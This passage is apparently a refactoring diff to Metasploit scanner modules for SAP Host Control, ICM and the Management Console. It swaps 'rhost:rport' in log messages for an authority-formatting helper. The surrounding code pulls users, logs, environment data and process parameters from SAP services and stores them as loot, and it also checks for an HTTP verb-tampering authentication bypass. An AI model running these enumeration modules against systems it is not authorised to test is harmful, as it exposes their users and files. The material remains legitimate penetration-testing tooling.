+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Unexpected Response: #{res.code} #{res.message}")
       return false
     end
   rescue ::Rex::ConnectionError
-    vprint_error("#{rhost}:#{rport} - Unable to connect")
+    vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Unable to connect")
     return false
   end
 end

--- a/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb
+++ b/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb
@@ -286,7 +286,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(rhost)
-    vprint_status("#{rhost}:#{rport} - Connecting to SAP Host Control service")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Connecting to SAP Host Control service")
 
     data = '<?xml version="1.0" encoding="utf-8"?>'
     data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"'
@@ -309,38 +309,38 @@ class MetasploitModule < Msf::Auxiliary
         }
       )
     rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - Unable to connect to service")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Unable to connect to service")
       return
     end
 
     if res && (res.code == 500) && res.body =~ %r{<faultstring>(.*)</faultstring>}i
       faultcode = ::Regexp.last_match(1).strip
-      vprint_error("#{rhost}:#{rport} - Error code: #{faultcode}")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Error code: #{faultcode}")
       return
 
     elsif res && (res.code != 200)
-      vprint_error("#{rhost}:#{rport} - Error in response")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Error in response")
       return
     end
 
     initialize_tables
 
-    vprint_good("#{rhost}:#{rport} - Connected. Retrieving info")
+    vprint_good("#{Rex::Socket.to_authority(rhost, rport)} - Connected. Retrieving info")
 
     begin
       response_xml = REXML::Document.new(res.body)
       computer_info = response_xml.elements.to_a('//mProperties/') # Computer info
       detailed_info = response_xml.elements.to_a('//item/mProperties/') # all other info
     rescue StandardError
-      print_error("#{rhost}:#{rport} - Unable to parse XML response")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Unable to parse XML response")
       return
     end
 
     success = parse_computer_info(computer_info)
     if success
-      print_good("#{rhost}:#{rport} - Information retrieved successfully")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Information retrieved successfully")
     else
-      print_error("#{rhost}:#{rport} - Unable to parse reply")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Unable to parse reply")
       return
     end
 
@@ -353,7 +353,7 @@ class MetasploitModule < Msf::Auxiliary
       sap_tables_clean << t.to_s
     end
 
-    vprint_good("#{rhost}:#{rport} - Information retrieved:\n" + sap_tables_clean)
+    vprint_good("#{Rex::Socket.to_authority(rhost, rport)} - Information retrieved:\n" + sap_tables_clean)
 
     xml_raw = store_loot(
       'sap.getcomputersystem',
@@ -373,6 +373,6 @@ class MetasploitModule < Msf::Auxiliary
       'SAP GetComputerSystem XML'
     )
 
-    print_status("#{rhost}:#{rport} - Response stored in #{xml_raw} (XML) and #{xml_parsed} (TXT)")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Response stored in #{xml_raw} (XML) and #{xml_parsed} (TXT)")
   end
 end

--- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb
+++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb
@@ -55,13 +55,13 @@ class MetasploitModule < Msf::Auxiliary
       @info = []
       if res.headers['Server']
         @info << res.headers['Server']
-        print_status("#{rhost}:#{rport} Server responded with the following Server Header: #{@info[0]}")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} Server responded with the following Server Header: #{@info[0]}")
       else
-        print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} Server responded with a blank or missing Server Header")
       end
 
       if res.body && /class="note">(.*)code:(.*)</i.match(res.body)
-        print_error("#{rhost}:#{rport} SAP ICM error message: #{::Regexp.last_match(2)}")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} SAP ICM error message: #{::Regexp.last_match(2)}")
       end
 
       # Load URLs
@@ -72,13 +72,13 @@ class MetasploitModule < Msf::Auxiliary
         end
       end
 
-      print_status("#{rhost}:#{rport} Beginning URL check")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} Beginning URL check")
       @valid_urls = ''
       urls_to_check.each do |url|
         check_url(url.strip)
       end
     else
-      print_error("#{rhost}:#{rport} No response received")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} No response received")
     end
 
     if !@valid_urls.empty?
@@ -161,7 +161,7 @@ class MetasploitModule < Msf::Auxiliary
     if res&.code == 200
       print_good("#{full_url} Got authentication bypass via HTTP verb tampering")
     else
-      vprint_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} Could not get authentication bypass via HTTP verb tampering")
     end
   end
 
@@ -186,7 +186,7 @@ class MetasploitModule < Msf::Auxiliary
         urls << url_dec.strip
       end
     else
-      print_error("#{rhost}:#{rport} Could not retrieve urlprefixes")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} Could not retrieve urlprefixes")
     end
 
     urls

--- a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb
+++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Auxiliary
     }, 25)
 
     if !res
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
       return
     end
 
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def extractabap(rhost)
-    print_status("#{rhost}:#{rport} [SAP] Connecting to SAP Management Console SOAP Interface")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Connecting to SAP Management Console SOAP Interface")
     success = false
 
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
@@ -92,13 +92,13 @@ class MetasploitModule < Msf::Auxiliary
         end
       end
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
       return
     end
 
     if success
-      print_status("#{rhost}:#{rport} [SAP] ABAP syslog downloading")
-      print_status("#{rhost}:#{rport} [SAP] Storing looted SAP ABAP syslog XML file")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} [SAP] ABAP syslog downloading")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Storing looted SAP ABAP syslog XML file")
       path = store_loot(
         'sap.abap.syslog',
         'text/xml',
@@ -107,12 +107,12 @@ class MetasploitModule < Msf::Auxiliary
         'sap_abap_syslog.xml',
         'SAP ABAP syslog'
       )
-      print_good("#{rhost}:#{rport} [SAP] SAP ABAP syslog XML file stored at #{path}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] SAP ABAP syslog XML file stored at #{path}")
     elsif fault
-      print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Error code: #{faultcode}")
       return
     else
-      print_error("#{rhost}:#{rport} [SAP] failed to access ABAPSyslog")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] failed to access ABAPSyslog")
       return
     end
   end

--- a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb
+++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Auxiliary
     }, 25)
 
     if !res
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
       return
     end
 
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def extractusers(rhost)
-    print_status("#{rhost}:#{rport} [SAP] Connecting to SAP Management Console SOAP Interface")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Connecting to SAP Management Console SOAP Interface")
     success = false
 
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
@@ -104,12 +104,12 @@ class MetasploitModule < Msf::Auxiliary
         end
       end
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication on #{rhost}:#{rport}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to attempt authentication on #{Rex::Socket.to_authority(rhost, rport)}")
       return
     end
 
     if success
-      print_good("#{rhost}:#{rport} [SAP] Users Extracted: #{users.length} entries extracted from #{rhost}:#{rport}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Users Extracted: #{users.length} entries extracted from #{Rex::Socket.to_authority(rhost, rport)}")
       report_note(
         host: rhost,
         proto: 'tcp',
@@ -120,12 +120,12 @@ class MetasploitModule < Msf::Auxiliary
       )
 
       users.each do |output|
-        print_good("#{rhost}:#{rport} [SAP] Extracted User: #{output[0]}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Extracted User: #{output[0]}")
       end
     elsif fault
-      print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Error code: #{faultcode}")
     else
-      print_error("#{rhost}#{rport} [SAP] failed to access ABAPSyslog on #{rhost}:#{rport}")
+      print_error("#{rhost}#{rport} [SAP] failed to access ABAPSyslog on #{Rex::Socket.to_authority(rhost, rport)}")
     end
   end
 end

--- a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb
+++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb
@@ -125,7 +125,7 @@ class MetasploitModule < Msf::Auxiliary
     elsif fault
       print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Error code: #{faultcode}")
     else
-      print_error("#{rhost}#{rport} [SAP] failed to access ABAPSyslog on #{Rex::Socket.to_authority(rhost, rport)}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] failed to access ABAPSyslog on #{Rex::Socket.to_authority(rhost, rport)}")
     end
   end
 end

--- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb
+++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Auxiliary
     }, 25)
 
     if !res
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
       return
     end
 
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def getacesspoints(rhost)
-    print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")
+    print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{Rex::Socket.to_authority(rhost, rport)}")
     success = false
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
     xsi = 'http://www.w3.org/2001/XMLSchema-instance'
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Auxiliary
         end
       end
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to attempt authentication")
       return
     end
 
@@ -136,12 +136,12 @@ class MetasploitModule < Msf::Auxiliary
         '.xml'
       )
 
-      print_good("#{rhost}:#{rport} [SAP] Access Point List: #{env.length} entries extracted\n#{saptbl}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Access Point List: #{env.length} entries extracted\n#{saptbl}")
 
     elsif fault
-      print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Error code: #{faultcode}")
     else
-      print_error("#{rhost}:#{rport} [SAP] failed to request environment")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] failed to request environment")
     end
   end
 end

--- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb
+++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Auxiliary
     }, 25)
 
     if !res
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
       return
     end
 
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def get_environment(rhost)
-    print_status("#{rhost}:#{rport} [SAP] Connecting to SAP Management Console SOAP Interface ")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Connecting to SAP Management Console SOAP Interface ")
     success = false
 
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
@@ -104,12 +104,12 @@ class MetasploitModule < Msf::Auxiliary
         end
       end
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
       return
     end
 
     if success
-      print_good("#{rhost}:#{rport} [SAP] Environment Extracted: #{env.length} entries extracted")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Environment Extracted: #{env.length} entries extracted")
       report_note(
         host: rhost,
         proto: 'tcp',
@@ -124,10 +124,10 @@ class MetasploitModule < Msf::Auxiliary
       end
 
     elsif fault
-      print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Error code: #{faultcode}")
       return
     else
-      print_error("#{rhost}:#{rport} [SAP] failed to request environment")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] failed to request environment")
       return
     end
   end

--- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb
+++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary
     }, 25)
 
     if !res
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
       return
     end
     if datastore['GETALL']
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def listfiles(rhost)
-    print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")
+    print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{Rex::Socket.to_authority(rhost, rport)}")
     success = false
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
     xsi = 'http://www.w3.org/2001/XMLSchema-instance'
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Auxiliary
     when /^TRACE/i
       ns1 = 'ns1:ListDeveloperTraces'
     else
-      print_error("#{rhost}:#{rport} [SAP] unsupported filetype #{datastore['FILETYPE']}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] unsupported filetype #{datastore['FILETYPE']}")
       return
     end
 
@@ -120,29 +120,29 @@ class MetasploitModule < Msf::Auxiliary
         end
       end
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to attempt authentication")
       return
     end
 
     if success
-      print_good("#{rhost}:#{rport} [SAP] #{datastore['FILETYPE'].downcase}: #{env.length} files available")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] #{datastore['FILETYPE'].downcase}: #{env.length} files available")
 
       env.each do |output|
         gettfiles(rhost, output[0], output[1])
       end
 
     elsif fault
-      print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Error code: #{faultcode}")
     else
-      print_error("#{rhost}:#{rport} [SAP] failed to list files")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] failed to list files")
     end
   end
 
   def gettfiles(rhost, logfile, filelen)
     if filelen
-      print_status("#{rhost}:#{rport} [SAP] Attempting to retrieve file #{logfile} (#{filelen} bytes)")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Attempting to retrieve file #{logfile} (#{filelen} bytes)")
     else
-      print_status("#{rhost}:#{rport} [SAP] Attempting to retrieve file #{logfile} (size unknown)")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Attempting to retrieve file #{logfile} (size unknown)")
     end
     success = false
 
@@ -157,7 +157,7 @@ class MetasploitModule < Msf::Auxiliary
     when /^TRACE/i
       ns1 = 'ns1:ReadDeveloperTrace'
     else
-      print_error("#{rhost}:#{rport} [SAP] unsupported filetype: #{datastore['FILETYPE']}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] unsupported filetype: #{datastore['FILETYPE']}")
       return
     end
 
@@ -208,12 +208,12 @@ class MetasploitModule < Msf::Auxiliary
         end
       end
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
       return
     end
 
     if success
-      print_good("#{rhost}:#{rport} [SAP] #{datastore['FILETYPE'].downcase}:#{logfile.downcase} looted")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] #{datastore['FILETYPE'].downcase}:#{logfile.downcase} looted")
       addr = Rex::Socket.getaddress(rhost) # Convert rhost to ip for DB
       p = store_loot(
         "sap.#{datastore['FILETYPE'].downcase}.file",
@@ -225,9 +225,9 @@ class MetasploitModule < Msf::Auxiliary
       )
       print_status("Logfile stored in: #{p}")
     elsif fault
-      print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Error code: #{faultcode}")
     else
-      print_error("#{rhost}:#{rport} [SAP] failed to download file")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] failed to download file")
     end
   end
 end

--- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb
+++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Auxiliary
     }, 25)
 
     if !res
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
       return
     end
 
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def getprocesslist(rhost)
-    print_status("#{rhost}:#{rport} [SAP] Connecting to SAP Management Console SOAP Interface ")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Connecting to SAP Management Console SOAP Interface ")
     success = false
 
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
@@ -105,12 +105,12 @@ class MetasploitModule < Msf::Auxiliary
         end
       end
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
       return
     end
 
     if success
-      print_good("#{rhost}:#{rport} [SAP] #{env.length} processes listed")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] #{env.length} processes listed")
 
       saptbl = Msf::Ui::Console::Table.new(
         Msf::Ui::Console::Table::Style::Default,
@@ -133,9 +133,9 @@ class MetasploitModule < Msf::Auxiliary
 
       print_line(saptbl.to_s)
     elsif fault
-      print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Error code: #{faultcode}")
     else
-      print_error("#{rhost}:#{rport} [SAP] failed to request process list")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] failed to request process list")
     end
   end
 end

--- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb
+++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def getprocparam(rhost)
-    print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")
+    print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{Rex::Socket.to_authority(rhost, rport)}")
     success = false
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
     xsi = 'http://www.w3.org/2001/XMLSchema-instance'
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Auxiliary
       })
 
       unless res
-        print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
         return
       end
 
@@ -96,10 +96,10 @@ class MetasploitModule < Msf::Auxiliary
           fault = true
         end
       else
-        print_error("#{rhost}:#{rport} [SAP] Unable to communicate with remote host.")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to communicate with remote host.")
       end
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to attempt authentication")
       return
     end
 
@@ -113,11 +113,11 @@ class MetasploitModule < Msf::Auxiliary
           res.body,
           '.xml'
         )
-        print_good("#{rhost}:#{rport} [SAP] Process Parameters: Entries extracted to #{loot}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Process Parameters: Entries extracted to #{loot}")
       else
         name_match = Regexp.new(datastore['MATCH'], Regexp::EXTENDED | Regexp::NOENCODING)
         print_status('[SAP] Regex match selected, skipping loot storage')
-        print_status("#{rhost}:#{rport} [SAP] Attempting to display configuration matches for #{name_match}")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Attempting to display configuration matches for #{name_match}")
 
         saptbl = Msf::Ui::Console::Table.new(
           Msf::Ui::Console::Table::Style::Default,
@@ -151,11 +151,11 @@ class MetasploitModule < Msf::Auxiliary
       end
 
     elsif fault
-      print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Error code: #{faultcode}")
 
     else
       # Something has gone horribly wrong
-      print_error("#{rhost}:#{rport} [SAP] failed to request environment")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] failed to request environment")
     end
   end
 end

--- a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb
+++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Auxiliary
     }, 25)
 
     if !res
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
       return
     end
 
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def enum_instance(rhost)
-    print_status("#{rhost}:#{rport} [SAP] Connecting to SAP Management Console SOAP Interface")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Connecting to SAP Management Console SOAP Interface")
     success = false
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
     xsi = 'http://www.w3.org/2001/XMLSchema-instance'
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Auxiliary
       }, 15)
 
       if res.nil?
-        print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
         return
       end
 
@@ -144,26 +144,26 @@ class MetasploitModule < Msf::Auxiliary
         end
       end
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
       return
     end
 
     if fault
-      print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Error code: #{faultcode}")
       return
     end
 
     unless success
-      print_error("#{rhost}:#{rport} [SAP] Failed to identify instance properties")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Failed to identify instance properties")
       return
     end
 
-    print_good("#{rhost}:#{rport} [SAP] Instance Properties Extracted")
+    print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Instance Properties Extracted")
     if centralservices
-      print_good("#{rhost}:#{rport} [SAP] Central Services: #{centralservices}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Central Services: #{centralservices}")
     end
     if sapsystem
-      print_good("#{rhost}:#{rport} [SAP] SAP System Number: #{sapsystem}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] SAP System Number: #{sapsystem}")
       report_note(host: rhost,
                   proto: 'tcp',
                   port: rport,
@@ -171,7 +171,7 @@ class MetasploitModule < Msf::Auxiliary
                   data: { proto: 'soap', sapsystem: sapsystem })
     end
     if sapsystemname
-      print_good("#{rhost}:#{rport} [SAP] SAP System Name: #{sapsystemname}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] SAP System Name: #{sapsystemname}")
       report_note(host: rhost,
                   proto: 'tcp',
                   port: rport,
@@ -179,7 +179,7 @@ class MetasploitModule < Msf::Auxiliary
                   data: { proto: 'soap', sapsystemname: sapsystemname })
     end
     if saplocalhost
-      print_good("#{rhost}:#{rport} [SAP] SAP Localhost: #{saplocalhost}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] SAP Localhost: #{saplocalhost}")
       report_note(host: rhost,
                   proto: 'tcp',
                   port: rport,
@@ -187,7 +187,7 @@ class MetasploitModule < Msf::Auxiliary
                   data: { proto: 'soap', saplocalhost: saplocalhost })
     end
     if instancename
-      print_good("#{rhost}:#{rport} [SAP] Instance Name: #{instancename}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Instance Name: #{instancename}")
       report_note(host: rhost,
                   proto: 'tcp',
                   port: rport,
@@ -195,7 +195,7 @@ class MetasploitModule < Msf::Auxiliary
                   data: { proto: 'soap', instancename: instancename })
     end
     if icmurl
-      print_good("#{rhost}:#{rport} [SAP] ICM URL: #{icmurl}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] ICM URL: #{icmurl}")
       report_note(host: rhost,
                   proto: 'tcp',
                   port: rport,
@@ -203,7 +203,7 @@ class MetasploitModule < Msf::Auxiliary
                   data: { proto: 'soap', icmurl: icmurl })
     end
     if igsurl
-      print_good("#{rhost}:#{rport} [SAP] IGS URL: #{igsurl}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] IGS URL: #{igsurl}")
       report_note(host: rhost,
                   proto: 'tcp',
                   port: rport,
@@ -211,7 +211,7 @@ class MetasploitModule < Msf::Auxiliary
                   data: { proto: 'soap', igsurl: igsurl })
     end
     if dbstring
-      print_good("#{rhost}:#{rport} [SAP] ABAP DATABASE: #{dbstring}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] ABAP DATABASE: #{dbstring}")
       report_note(host: rhost,
                   proto: 'tcp',
                   port: rport,
@@ -220,7 +220,7 @@ class MetasploitModule < Msf::Auxiliary
                   update: :unique_data)
     end
     if j2eedbstring
-      print_good("#{rhost}:#{rport} [SAP] J2EE DATABASE: #{j2eedbstring}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] J2EE DATABASE: #{j2eedbstring}")
       report_note(host: rhost,
                   proto: 'tcp',
                   port: rport,
@@ -230,7 +230,7 @@ class MetasploitModule < Msf::Auxiliary
     end
     if protectedweb
       protectedweb_arr = protectedweb.split(',')
-      print_good("#{rhost}:#{rport} [SAP] Protected Webmethods (auth required) :::")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Protected Webmethods (auth required) :::")
       print_status(protectedweb.to_s)
       report_note(host: rhost,
                   proto: 'tcp',
@@ -247,7 +247,7 @@ class MetasploitModule < Msf::Auxiliary
         webmethods_output << webm unless protectedweb_arr && protectedweb_arr.include?(webm)
       end
       if webmethods_output
-        print_good("#{rhost}:#{rport} [SAP] Unprotected Webmethods :::")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unprotected Webmethods :::")
         print_status(webmethods_output.join(',').to_s)
       end
       report_note(host: rhost,

--- a/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.rb
+++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary
     }, 25)
 
     if !res
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
       return
     end
 
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def enum_instance(rhost)
-    print_status("#{rhost}:#{rport} [SAP] Connecting to SAP Management Console SOAP Interface")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Connecting to SAP Management Console SOAP Interface")
 
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
     xsi = 'http://www.w3.org/2001/XMLSchema-instance'
@@ -93,26 +93,26 @@ class MetasploitModule < Msf::Auxiliary
     }, 15)
 
     unless res
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
       return
     end
 
     if res.code == 500 && res.body =~ %r{<faultstring>(.*)</faultstring>}i
-      print_error("#{rhost}:#{rport} [SAP] Error code: #{::Regexp.last_match(1).strip}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Error code: #{::Regexp.last_match(1).strip}")
       return
     end
 
     if res.code == 200 && res.body =~ %r{<item>([^<]+)</item>}i
